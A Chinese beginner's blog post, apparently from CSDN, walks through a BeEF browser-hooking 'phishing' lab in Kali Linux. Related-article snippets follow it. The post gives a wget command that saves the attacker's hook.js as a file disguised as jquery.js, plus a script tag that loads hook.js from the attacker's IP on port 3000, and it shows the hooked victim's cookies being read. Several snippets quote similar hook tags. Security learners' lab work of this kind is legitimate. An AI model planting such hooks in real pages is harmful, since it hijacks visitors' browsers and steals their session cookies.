kali linux小白学习(beef网络钓鱼攻击)

最新推荐文章于 2023-10-26 09:25:29 发布
最新推荐文章于 2023-10-26 09:25:29 发布
阅读量278 收藏 1
点赞数 1
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Build20/article/details/130968724
版权

首先打开beef-xss工具

打开var/www/html文件并查看里面的文件(linux目录下有个目录:/var/www/html,把文件放到这个目录下就可以通过IP很方便的访问)

 之后,执行wget http://<your kali IP>:3000/hook.js -O /var/www/html/jquery.js命令,执行ls命令可看出生成了一个攻击文件jquery.js,该文件包含xss攻击代码<script src=http://192.168.230.129:3000/hook.js></script>。

 之后打开apache2服务器(apache两个主要作用:

1.解析网页语言,如html,php,jsp等

2.接收web用户的请求,并给予一定的响应)

 之后进入靶机,把kali机的ip地址输入,可以看到上钩了。

 回到kali机,可以看到上钩了,我可以查看他的cookie了。

Build23
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BeEf:利用跨站脚本漏洞进行钓鱼
qq_42773814的博客
01-19 2412
BeEf 简介 BeEf 是目前最为流行的 Web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework 。 BeEf 提供一个 Web 界面来进行操作,只要访问了嵌入 hook.js 的页面,抑或执行了 hook.js 文件的浏览器,就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。 最新的kali系统已经不会默认安装 BeEf ,需要我们自行安装。 apt install beef-xss 安装完成后,直接
kali linux钓鱼教程,Kali linux建立钓鱼热点
weixin_34012355的博客
05-09 1449
主要内容:参考网上多篇文章,自己动手完全实验成功,在这里详细记录自己在kalilinux下的搭建过程,本文着重于动手实现,不涉及原理,关于原理应该会在之后的单独文章中详细探究实验环境:Host 主机: Windows 8 64位虚拟机软件:VirtualBox 4.3.8(需要安装同4.3.8版本 拓展包 和 增强功能包 ,这是两个不同的包!安装增强包的时候需要安装相应的内核头文件和编译环境,这...
初探BeEF
weixin_30258901的博客
01-23 286
1.什么是BeEF? 就是The Browser Exploitation Framework 的缩写,意在通过一些手段,控制对方的浏览器。 里面集成了很多模块,能够获取很多东西,有cookie,浏览器名字,版本,插件,是否支持java,vb,flash等,所以说XSS神器嘛。。 大概长这个样子(默认用户名密码是beefbeef): 2.安装beef和使用beef BT5...
beef-xss钓鱼
Williamanddog的博客
01-27 604
BeEF(Browser Exploitation Framework)是一款非常强大的Web框架攻击平台,集成了许多 payload,可以通过XSS漏洞配合JavaScript脚本和Metasploit进行渗透。如果你的kali中没有beef的话,执行sudo apt install beef-xss进行安装。_ip:3000/clone_pikachu ,可以看到beef中有机器上线,在页面中进行登录。找到配置文件/usr/share/beef-xss/config.yaml。回到前台查看是否一致。
如何在Kali Linux中搭建钓鱼热点
weixin_33919950的博客
07-21 369
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用! 0×00 实验环境 操作系统:Kali 1.0 (VM) FackAP: easy-creds 硬件:NETGEAR wg111 v3 RTL8187B 网卡(kali下免驱) 靶机:安卓、iPhone设备 0×01 环境搭建 git clone https://git...
Linux自动化简单安装beef xss framework的方法及BeEF的启动
01-28 3567
LinuxBeEF的安装
Kali Linux 网络扫描秘籍 中文版.zip
05-12
Kali Linux 网络扫描秘籍 中文版 Kali Linux 网络扫描秘籍 中文版 Kali Linux 网络扫描秘籍 中文版 Kali Linux 网络扫描秘籍 中文版 Kali Linux 网络扫描秘籍 中文版 ...
kali Linux全套视频加工具学习资料
04-25
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
网络攻防安全kali Linux漏洞扫描
最新发布
06-18
网络攻防 网络安全 kali Linux 漏洞扫描教程
KALI linux学习记录笔记
05-13
KALI linux学习记录笔记 linux入门的笔记,包括常用命令!
Kali Linux WiFi攻击与防护.rar
11-03
我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
beef结合msf钓鱼
weixin_34174132的博客
03-17 653
Kali linux 系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannel beef/beef 嵌入代码<script src="Ip:3000/h...
KaliBeef利用Xss进行钓鱼
My灬Futrue的博客
07-07 1745
1、操作准备 攻击机:Kaliip地址:192.168.1.107) 受害者:Windows7 x64(ip地址:192.168.1.163) 2、配置Beef 进入beef的配置文件里 root@kali:~# vim /etc/beef-xss/config.yaml 在这里可以看到beef的默认用户名和密码,也可以进行修改,我这里对默认的密码进行了修改 注:(默认beef用户名和密码位User:beef,Password:beef) 3、启动Beef root@kali:~# beef-xss
xss--钓鱼beef
qq_51802152的博客
10-26 132
kali---beef 牛肉的使用
kali安装beef-xss(笔者的踩坑之旅)
m0_52403371的博客
04-03 2175
kali安装beef-xss(笔者的踩坑之旅)
BEEF的使用(简单版)
zzlx123的博客
12-20 2463
BeEF BEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。 BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段...
kali钓鱼(超详细)
m0_52934166的博客
08-07 2220
kali钓鱼
beef-xss+Sunny-Ngrok实现内网穿透
qq_32006199的博客
07-15 1190
一、实验工具 1、kali linux 2019.1-vm-amd64 2、beef-xss 3、sunny-ngrok 二、步骤 1、运行sunny程序 ./sunny clientid 隧道id 2、自定义监听端口并开启beef-xss 修改配置文件,配置文件路径:/etc/beef-xss/config.yam 启动beef-xss beef-xss 3、在目标网站的注入点进行xss...
精通Kali Linux 高级渗透测试2023版本,英文原版
07-12
Kali Linux作为一款强大的开源渗透测试工具,是学习者和专业渗透测试人员的必备资源,它提供了广泛的工具集和攻击模拟环境,以便进行系统评估、漏洞探测和道德黑客活动。 书中内容涵盖了从基础配置到高级技术的全面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值